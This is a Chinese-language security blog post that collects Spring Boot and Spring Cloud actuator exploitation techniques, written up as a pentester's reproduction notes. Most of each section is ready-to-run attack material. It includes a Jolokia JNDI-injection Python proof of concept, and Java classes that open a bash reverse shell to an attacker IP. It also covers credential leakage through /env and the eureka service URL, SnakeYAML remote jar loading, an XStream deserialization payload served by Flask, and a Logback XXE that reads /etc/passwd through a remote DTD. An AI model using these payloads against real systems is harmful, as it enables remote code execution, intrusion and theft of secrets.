<!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta name="X-UA-Compatible" content="IE=edge"><title> Springboot漏洞利用 · 认真学习的小白帽</title><meta name="description" content="Springboot漏洞利用 - Drea1v1"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="icon" href="/favicon.ico"><link rel="stylesheet" href="/css/prontera.css"><link rel="search" type="application/opensearchdescription+xml" href="https://drea1v1.github.io/atom.xml" title="认真学习的小白帽"><meta name="generator" content="Hexo 4.2.1"><link rel="alternate" href="/atom.xml" title="认真学习的小白帽" type="application/atom+xml">
</head><body><header class="feature-header"><nav class="component-nav"><ul><div class="logo-container"><a href="/"><h2 class="title">认真学习的小白帽</h2></a></div><a href="/" target="_self" class="li component-nav-item"><p>INDEX</p></a><a href="/archives" target="_self" class="li component-nav-item"><p>ARCHIVES</p></a><ul class="shortcut-icons"><a href="https://github.com/Drea1v1" target="_blank"><img src="/images/github.svg" class="icon"></a><a href="/atom.xml" target="_blank"><img src="/images/rss.svg" class="icon"></a></ul></ul></nav></header><main class="container"><div id="post-container"><div class="post"><article class="post-block"><h1 class="post-title">Springboot漏洞利用</h1><div class="post-info">Aug 10, 2020</div><div class="post-content"><h1 id="Springboot漏洞利用"><a href="#Springboot漏洞利用" class="headerlink" title="Springboot漏洞利用"></a>Springboot漏洞利用</h1><h2 id="前言"><a href="#前言" class="headerlink" title="前言"></a>前言</h2><p>平时遇到很多springboot框架的系统，总结一下常见的利用方式，并且记录一下复现过程中所遇到的问题。</p>
<h2 id="Jolokia-RCE-JNDI注入"><a href="#Jolokia-RCE-JNDI注入" class="headerlink" title="Jolokia RCE(JNDI注入)"></a>Jolokia RCE(JNDI注入)</h2><blockquote>
<p>利用前提，查看/jolokia/list 中存在的是否存在org.apache.catalina.mbeans.MBeanFactory类提供的createJNDIRealm方法，以及java满足rmi远程加载限制的版本，看下图。</p>
</blockquote>
<p>祭出神图：</p>
<p><img src="/images/Springboot/image-20200729155302181.png" alt="image-20200729155302181"></p>
<p>默认配置的contextFactory:</p>
<p><img src="/images/Springboot/image-20200714214318953.png" alt="image-20200714214318953"></p>
<p>访问<a href="http://ip:port/jolokia/list，查看存在createJNDIRealm">http://ip:port/jolokia/list，查看存在createJNDIRealm</a>:</p>
<p><img src="/images/Springboot/image-20200729162032044.png" alt="image-20200729162032044"></p>
<p>架设rmi服务:</p>
<p><img src="/images/Springboot/image-20200805154339918.png" alt="image-20200805154339918"></p>
<p>架设web服务，放置恶意利用类:</p>
<p><img src="/images/Springboot/image-20200805154413412.png" alt="image-20200805154413412"></p>
<p>恶意利用类:</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">public</span> <span class="class"><span class="keyword">class</span> <span class="title">Exploit_shell</span> </span>&#123;</span><br><span class="line">    <span class="keyword">static</span> &#123;</span><br><span class="line">        <span class="keyword">try</span> &#123;</span><br><span class="line">                java.lang.Runtime.getRuntime().exec(<span class="keyword">new</span> String[]&#123;<span class="string">"bash"</span>,<span class="string">"-c"</span>,<span class="string">"bash -i &gt;&amp; /dev/tcp/172.20.10.3/9999 0&gt;&amp;1"</span>&#125;);</span><br><span class="line">        &#125; <span class="keyword">catch</span> (Exception e) &#123;</span><br><span class="line">            <span class="comment">// do nothing</span></span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>利用poc：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#encoding=utf-8</span></span><br><span class="line"><span class="keyword">import</span> requests <span class="keyword">as</span> req</span><br><span class="line"><span class="keyword">import</span> sys</span><br><span class="line"><span class="keyword">from</span> pprint <span class="keyword">import</span> pprint</span><br><span class="line"></span><br><span class="line">url = sys.argv[<span class="number">1</span>] + <span class="string">"/jolokia/"</span></span><br><span class="line">pprint(url)</span><br><span class="line"><span class="comment">#创建JNDIRealm</span></span><br><span class="line">create_JNDIrealm = &#123;</span><br><span class="line">    <span class="string">"mbean"</span>: <span class="string">"Tomcat:type=MBeanFactory"</span>,</span><br><span class="line">    <span class="string">"type"</span>: <span class="string">"EXEC"</span>,</span><br><span class="line">    <span class="string">"operation"</span>: <span class="string">"createJNDIRealm"</span>,</span><br><span class="line">    <span class="string">"arguments"</span>: [<span class="string">"Tomcat:type=Engine"</span>]</span><br><span class="line">&#125;</span><br><span class="line"><span class="comment">#写入contextFactory</span></span><br><span class="line">set_contextFactory = &#123;</span><br><span class="line">    <span class="string">"mbean"</span>: <span class="string">"Tomcat:realmPath=/realm0,type=Realm"</span>,</span><br><span class="line">    <span class="string">"type"</span>: <span class="string">"WRITE"</span>,</span><br><span class="line">    <span class="string">"attribute"</span>: <span class="string">"contextFactory"</span>,</span><br><span class="line">    <span class="string">"value"</span>: <span class="string">"com.sun.jndi.rmi.registry.RegistryContextFactory"</span></span><br><span class="line">&#125;</span><br><span class="line"><span class="comment">#写入connectionURL为自己公网RMI service地址</span></span><br><span class="line">set_connectionURL = &#123;</span><br><span class="line">    <span class="string">"mbean"</span>: <span class="string">"Tomcat:realmPath=/realm0,type=Realm"</span>,</span><br><span class="line">    <span class="string">"type"</span>: <span class="string">"WRITE"</span>,</span><br><span class="line">    <span class="string">"attribute"</span>: <span class="string">"connectionURL"</span>,</span><br><span class="line">    <span class="string">"value"</span>: <span class="string">"rmi://172.20.10.3:1099/Exploit_shell"</span></span><br><span class="line">&#125;</span><br><span class="line"><span class="comment">#停止Realm</span></span><br><span class="line">stop_JNDIrealm = &#123;</span><br><span class="line">    <span class="string">"mbean"</span>: <span class="string">"Tomcat:realmPath=/realm0,type=Realm"</span>,</span><br><span class="line">    <span class="string">"type"</span>: <span class="string">"EXEC"</span>,</span><br><span class="line">    <span class="string">"operation"</span>: <span class="string">"stop"</span>,</span><br><span class="line">    <span class="string">"arguments"</span>: []</span><br><span class="line">&#125;</span><br><span class="line"><span class="comment">#运行Realm，触发JNDI 注入</span></span><br><span class="line">start = &#123;</span><br><span class="line">    <span class="string">"mbean"</span>: <span class="string">"Tomcat:realmPath=/realm0,type=Realm"</span>,</span><br><span class="line">    <span class="string">"type"</span>: <span class="string">"EXEC"</span>,</span><br><span class="line">    <span class="string">"operation"</span>: <span class="string">"start"</span>,</span><br><span class="line">    <span class="string">"arguments"</span>: []</span><br><span class="line">&#125;</span><br><span class="line">expoloit = [create_JNDIrealm, set_contextFactory, set_connectionURL, stop_JNDIrealm, start]</span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> expoloit:</span><br><span class="line">    rep = req.post(url, json=i)</span><br><span class="line">    pprint(rep.json())</span><br></pre></td></tr></table></figure>

<p>执行后，加载远程恶意类，成功反弹shell:</p>
<p><img src="/images/Springboot/image-20200805154612574.png" alt="image-20200805154612574"></p>
<h3 id="小思考"><a href="#小思考" class="headerlink" title="小思考"></a>小思考</h3><p>实际环境下，我遇到java版本是不满足rmi的利用的，然后想试一下ldap加载利用类，修改了py脚本的set_contextFactory(这个其实不需要修改，因为我在调试的过程中发现默认是使用的ldap的com.sun.jndi.ldap.LdapCtxFactory，只有使用rmi的时候才需要修改为rmi的factory类)，以及加载的url为ldap协议，发现是不可行的。经过我的调试分析，该处利用的是rmi的initialdircontext(env)方法中存在jndi注入，正常情况下initialdircontext(env)的env是不可控的，但是这里可以直接通过提供的方法直接修改env的值，并且rmi在初始化过程直接调用了lookup()，刚好触发jndi注入。</p>
<p><img src="/images/Springboot/image-20200729160732716.png" alt="image-20200729160732716"></p>
<p><img src="/images/Springboot/image-20200729161033440.png" alt="image-20200729161033440"></p>
<p>对比了ldap和rmi的factory类，实际ldap是不会在initialdircontext(env)方法中触发jndi注入的，所以这里是用不了ldap协议，只能使用rmi协议。(这里只是我自己调试得出来的结果，并不是完全正确的，因为对springboot并不是很熟悉，可能其他大佬已经研究新的利用)</p>
<p><img src="/images/Springboot/image-20200715220903030.png" alt="image-20200715220903030"></p>
<h2 id="env-获取敏感信息"><a href="#env-获取敏感信息" class="headerlink" title="env 获取敏感信息"></a>env 获取敏感信息</h2><blockquote>
<p>默认情况下利用该漏洞可以获取带*的敏感信息，利用前提是需要系统的依赖中包含有eureka-client。</p>
</blockquote>
<p>查看<strong>/env</strong>中想要获取的敏感信息,比如这里的数据库密码：</p>
<p><img src="/images/Springboot/image-20200720202326624.png" alt="image-20200720202326624"></p>
<p>设置eureka.client的服务中心地址为http://${变量名}@ip/</p>
<p><img src="/images/Springboot/image-20200720202640340.png" alt="image-20200720202640340"></p>
<p>发送refresh包，有请求传入，获取到的信息用base64解码即可。</p>
<p><img src="/images/Springboot/image-20200720204305573.png" alt="image-20200720204305573"></p>
<p><img src="/images/Springboot/image-20200720204635602.png" alt="image-20200720204635602"></p>
<h2 id="SpringCloud-env-yaml利用"><a href="#SpringCloud-env-yaml利用" class="headerlink" title="SpringCloud env yaml利用"></a>SpringCloud env yaml利用</h2><blockquote>
<p>利用前提Springboot使用SpringCloud相关组件，会存在spring.cloud.bootstrap.location属性，通过修改 spring.cloud.bootstrap.location 环境变量实现 RCE</p>
</blockquote>
<p>yaml文件远程加载恶意利用jar包：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">!!javax.script.ScriptEngineManager [</span><br><span class="line">  !!java.net.URLClassLoader [[</span><br><span class="line">    !!java.net.URL [&quot;http:&#x2F;&#x2F;127.0.0.1:8888&#x2F;yaml.jar&quot;]</span><br><span class="line">  ]]</span><br><span class="line">]</span><br></pre></td></tr></table></figure>

<p><img src="/images/Springboot/image-20200720231134160.png" alt="image-20200720231134160"></p>
<p>可以使用命令进行快速编译打包：</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">javac src/artsploit/AwesomeScriptEngineFactory.java</span><br><span class="line">jar -cvf yaml-payload.jar -C src/ .</span><br></pre></td></tr></table></figure>

<p><img src="/images/Springboot/image-20200720233048643.png" alt="image-20200720233048643"></p>
<p>将恶意代码编译后打包成jar包，部署在web服务器上：</p>
<p><img src="/images/Springboot/image-20200729154105614.png" alt="image-20200729154105614"></p>
<p><img src="/images/Springboot/image-20200720230925293.png" alt="image-20200720230925293"></p>
<p>设置<strong>spring.cloud.bootstrap.location</strong>为yaml文件所在的vps。</p>
<p><img src="/images/Springboot/image-20200720233112107.png" alt="image-20200720233112107"></p>
<p>发送刷新包，弹出计算器(如需反弹或执行命令可以修改利用类的代码)</p>
<p><img src="/images/Springboot/image-20200720233022076.png" alt="image-20200720233022076"></p>
<h2 id="Springcloud-Netflix-xstream反序列化"><a href="#Springcloud-Netflix-xstream反序列化" class="headerlink" title="Springcloud-Netflix xstream反序列化"></a>Springcloud-Netflix xstream反序列化</h2><blockquote>
<p>利用前提，服务器使用Eureka-Client，即有加载spring-cloud-starter-netflix-eureka-client依赖。</p>
</blockquote>
<p>创建一个服务，将xstream格式的内容返回给请求者，这里可以使用python的flask框架快速搭建(python要先pip安装flask模块)：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> flask <span class="keyword">import</span> Flask, Response</span><br><span class="line"></span><br><span class="line">app = Flask(__name__)</span><br><span class="line"><span class="meta">@app.route('/', defaults=&#123;'path': ''&#125;)</span></span><br><span class="line"><span class="meta">@app.route('/&lt;path:path&gt;', methods = ['GET', 'POST'])</span></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">catch_all</span><span class="params">(path)</span>:</span></span><br><span class="line">    xml = <span class="string">"""&lt;linked-hash-set&gt;</span></span><br><span class="line"><span class="string">  &lt;jdk.nashorn.internal.objects.NativeString&gt;</span></span><br><span class="line"><span class="string">    &lt;value class="com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data"&gt;</span></span><br><span class="line"><span class="string">      &lt;dataHandler&gt;</span></span><br><span class="line"><span class="string">        &lt;dataSource class="com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource"&gt;</span></span><br><span class="line"><span class="string">          &lt;is class="javax.crypto.CipherInputStream"&gt;</span></span><br><span class="line"><span class="string">            &lt;cipher class="javax.crypto.NullCipher"&gt;</span></span><br><span class="line"><span class="string">              &lt;serviceIterator class="javax.imageio.spi.FilterIterator"&gt;</span></span><br><span class="line"><span class="string">                &lt;iter class="javax.imageio.spi.FilterIterator"&gt;</span></span><br><span class="line"><span class="string">                  &lt;iter class="java.util.Collections$EmptyIterator"/&gt;</span></span><br><span class="line"><span class="string">                  &lt;next class="java.lang.ProcessBuilder"&gt;</span></span><br><span class="line"><span class="string">                    &lt;command&gt;</span></span><br><span class="line"><span class="string">                    	&lt;string&gt;open&lt;/string&gt;</span></span><br><span class="line"><span class="string">                      &lt;string&gt;/System/Applications/Calculator.app&lt;/string&gt;</span></span><br><span class="line"><span class="string">                    &lt;/command&gt;</span></span><br><span class="line"><span class="string">                    &lt;redirectErrorStream&gt;false&lt;/redirectErrorStream&gt;</span></span><br><span class="line"><span class="string">                  &lt;/next&gt;</span></span><br><span class="line"><span class="string">                &lt;/iter&gt;</span></span><br><span class="line"><span class="string">                &lt;filter class="javax.imageio.ImageIO$ContainsFilter"&gt;</span></span><br><span class="line"><span class="string">                  &lt;method&gt;</span></span><br><span class="line"><span class="string">                    &lt;class&gt;java.lang.ProcessBuilder&lt;/class&gt;</span></span><br><span class="line"><span class="string">                    &lt;name&gt;start&lt;/name&gt;</span></span><br><span class="line"><span class="string">                    &lt;parameter-types/&gt;</span></span><br><span class="line"><span class="string">                  &lt;/method&gt;</span></span><br><span class="line"><span class="string">                  &lt;name&gt;foo&lt;/name&gt;</span></span><br><span class="line"><span class="string">                &lt;/filter&gt;</span></span><br><span class="line"><span class="string">                &lt;next&gt;foo&lt;/next&gt;</span></span><br><span class="line"><span class="string">              &lt;/serviceIterator&gt;</span></span><br><span class="line"><span class="string">              &lt;lock/&gt;</span></span><br><span class="line"><span class="string">            &lt;/cipher&gt;</span></span><br><span class="line"><span class="string">            &lt;input class="java.lang.ProcessBuilder$NullInputStream"/&gt;</span></span><br><span class="line"><span class="string">            &lt;ibuffer&gt;&lt;/ibuffer&gt;</span></span><br><span class="line"><span class="string">          &lt;/is&gt;</span></span><br><span class="line"><span class="string">        &lt;/dataSource&gt;</span></span><br><span class="line"><span class="string">      &lt;/dataHandler&gt;</span></span><br><span class="line"><span class="string">    &lt;/value&gt;</span></span><br><span class="line"><span class="string">  &lt;/jdk.nashorn.internal.objects.NativeString&gt;</span></span><br><span class="line"><span class="string">&lt;/linked-hash-set&gt;"""</span></span><br><span class="line">    <span class="keyword">return</span> Response(xml, mimetype=<span class="string">'application/xml'</span>)</span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span>  __name__  ==  <span class="string">'__main__'</span>:</span><br><span class="line">    app.run(host=<span class="string">'0.0.0.0'</span>, port=<span class="number">9000</span>, debug=<span class="literal">True</span>)</span><br></pre></td></tr></table></figure>

<p><img src="/images/Springboot/image-20200721223255897.png" alt="image-20200721223255897"></p>
<p>发送请求设置服务地址:</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line">POST &#x2F;env HTTP&#x2F;1.1</span><br><span class="line">Host: 192.168.0.101:8090</span><br><span class="line">Pragma: no-cache</span><br><span class="line">Cache-Control: no-cache</span><br><span class="line">Upgrade-Insecure-Requests: 1</span><br><span class="line">User-Agent: Mozilla&#x2F;5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit&#x2F;537.36 (KHTML, like Gecko) Chrome&#x2F;83.0.4103.116 Safari&#x2F;537.36</span><br><span class="line">Accept: text&#x2F;html,application&#x2F;xhtml+xml,application&#x2F;xml;q&#x3D;0.9,image&#x2F;webp,image&#x2F;apng,*&#x2F;*;q&#x3D;0.8,application&#x2F;signed-exchange;v&#x3D;b3;q&#x3D;0.9</span><br><span class="line">Accept-Encoding: gzip, deflate</span><br><span class="line">Accept-Language: zh-CN,zh;q&#x3D;0.9</span><br><span class="line">Connection: close</span><br><span class="line">Content-Type: application&#x2F;x-www-form-urlencoded</span><br><span class="line">Content-Length: 70</span><br><span class="line"></span><br><span class="line">eureka.client.serviceUrl.defaultZone&#x3D;http:&#x2F;&#x2F;192.168.0.101:9000&#x2F;xstream</span><br></pre></td></tr></table></figure>

<p>刷新:</p>
<p><img src="/images/Springboot/image-20200729163130406.png" alt="image-20200729163130406"></p>
<p>弹出计算器:</p>
<p><img src="/images/Springboot/image-20200805144136621.png" alt="image-20200805144136621"></p>
<p><strong>注:在复现过程中，直接在<string>标签中加上命令和参数发现无法执行，原来需要使用两个string标签拼接。该poc与Struts2-052的利用链基本一样，但是不是使用<map>类型而是<linked-hash-set>。</linked-hash-set></map></string></strong></p>
<h2 id="Jolokia-XXE-Logback"><a href="#Jolokia-XXE-Logback" class="headerlink" title="Jolokia XXE(Logback)"></a>Jolokia XXE(Logback)</h2><blockquote>
<p>利用前提，查看jolokia/list中存在的 Mbeans，是否存在logback 库提供的reloadByURL方法</p>
</blockquote>
<p><img src="/images/Springboot/image-20200806084926783.png" alt="image-20200806084926783"></p>
<p>logback.xml:</p>
<figure class="highlight xml"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?xml version="1.0" encoding="utf-8" ?&gt;</span></span><br><span class="line"><span class="meta">&lt;!DOCTYPE a [ <span class="meta">&lt;!ENTITY % <span class="meta-keyword">remote</span> <span class="meta-keyword">SYSTEM</span> <span class="meta-string">"http://172.20.10.3:8090/fileread.dtd"</span>&gt;</span>%remote;%int;]&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">a</span>&gt;</span><span class="symbol">&amp;trick;</span><span class="tag">&lt;/<span class="name">a</span>&gt;</span></span><br></pre></td></tr></table></figure>

<p>fileread.dtd:</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">&lt;!ENTITY % d SYSTEM &quot;file:&#x2F;&#x2F;&#x2F;etc&#x2F;passwd&quot;&gt;</span><br><span class="line">&lt;!ENTITY % int &quot;&lt;!ENTITY trick SYSTEM &#39;:%d;&#39;&gt;&quot;&gt;</span><br></pre></td></tr></table></figure>

<p>访问链接加载xml:</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http:&#x2F;&#x2F;172.20.10.3:8090&#x2F;jolokia&#x2F;exec&#x2F;ch.qos.logback.classic:Name&#x3D;default,Type&#x3D;ch.qos.logback.classic.jmx.JMXConfigurator&#x2F;reloadByURL&#x2F;http:!&#x2F;!&#x2F;172.20.10.3!&#x2F;logback.xml</span><br></pre></td></tr></table></figure>

<p>将dtd和xml放置在同一服务器:</p>
<p><img src="/images/Springboot/image-20200806101731095.png" alt="image-20200806101731095"></p>
<p>成功读取文件内容:</p>
<p><img src="/images/Springboot/image-20200806102027810.png" alt="image-20200806102027810"></p>
<h3 id="小提示"><a href="#小提示" class="headerlink" title="小提示"></a>小提示</h3><p>在java中可以使用netdoc协议读取文件，并且该漏洞可以列目录读取文件名为目录即可。注:读取文件内容包含&lt;,&amp;等特殊字符时，会报错，可采取CDATA标签拼接，参考最后的文章(本地测试无法实现，原因未知)。</p>
<h2 id="Jolokia-RCE-Logback"><a href="#Jolokia-RCE-Logback" class="headerlink" title="Jolokia RCE(Logback)"></a>Jolokia RCE(Logback)</h2><blockquote>
<p>利用前提与xxe类似。</p>
</blockquote>
<p>访问链接：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http:&#x2F;&#x2F;127.0.0.1:8090&#x2F;jolokia&#x2F;exec&#x2F;ch.qos.logback.classic:Name&#x3D;default,Type&#x3D;ch.qos.logback.classic.jmx.JMXConfigurator&#x2F;reloadByURL&#x2F;http:!&#x2F;!&#x2F;172.20.10.3:8090&#x2F;!&#x2F;logback_rce.xml</span><br></pre></td></tr></table></figure>

<p>logback_rce.xml:</p>
<figure class="highlight xml"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="tag">&lt;<span class="name">configuration</span>&gt;</span></span><br><span class="line">  <span class="tag">&lt;<span class="name">insertFromJNDI</span> <span class="attr">env-entry-name</span>=<span class="string">"rmi://172.20.10.3:1099/Exploit_shell"</span> <span class="attr">as</span>=<span class="string">"appName"</span> /&gt;</span></span><br><span class="line"><span class="tag">&lt;/<span class="name">configuration</span>&gt;</span></span><br></pre></td></tr></table></figure>

<p>Exploit_shell.java:</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">public</span> <span class="class"><span class="keyword">class</span> <span class="title">Exploit_shell</span> </span>&#123;</span><br><span class="line">    <span class="keyword">static</span> &#123;</span><br><span class="line">        <span class="keyword">try</span> &#123;</span><br><span class="line">                java.lang.Runtime.getRuntime().exec(<span class="keyword">new</span> String[]&#123;<span class="string">"bash"</span>,<span class="string">"-c"</span>,<span class="string">"bash -i &gt;&amp; /dev/tcp/172.20.10.3/9999 0&gt;&amp;1"</span>&#125;);</span><br><span class="line">        &#125; <span class="keyword">catch</span> (Exception e) &#123;</span><br><span class="line">            <span class="comment">// do nothing</span></span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>web服务:</p>
<p><img src="/images/Springboot/image-20200806162417622.png" alt="image-20200806162417622"></p>
<p>rmi服务：</p>
<p><img src="/images/Springboot/image-20200806162357151.png" alt="image-20200806162357151"></p>
<p>反弹shell:</p>
<p><img src="/images/Springboot/image-20200806162728554.png" alt="image-20200806162728554"></p>
<h2 id="参考链接："><a href="#参考链接：" class="headerlink" title="参考链接："></a>参考链接：</h2><p><a href="https://xz.aliyun.com/t/7811" target="_blank" rel="noopener">https://xz.aliyun.com/t/7811</a></p>
<p><a href="https://www.anquanke.com/post/id/173265" target="_blank" rel="noopener">https://www.anquanke.com/post/id/173265</a></p>
<p><a href="https://www.anquanke.com/post/id/204314" target="_blank" rel="noopener">https://www.anquanke.com/post/id/204314</a></p>
<p><a href="https://xz.aliyun.com/t/3357" target="_blank" rel="noopener">https://xz.aliyun.com/t/3357</a></p>
</div></article></div></div></main><footer class="footer-container"><div class="paginator"><a href="/2020/10/22/markdown/" class="prev">PREV</a><a href="/2020/06/17/%E7%94%A8%E5%8F%8Bnc%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/" class="next">NEXT</a></div><div class="copyright"><p>© 2020 <a href="https://drea1v1.github.io">Drea1v1</a>, powered by <a href="https://hexo.io/" target="_blank">Hexo</a> and <a href="https://github.com/AngryPowman/hexo-theme-prontera" target="_blank">hexo-theme-prontera</a>.</p></div></footer></body></html>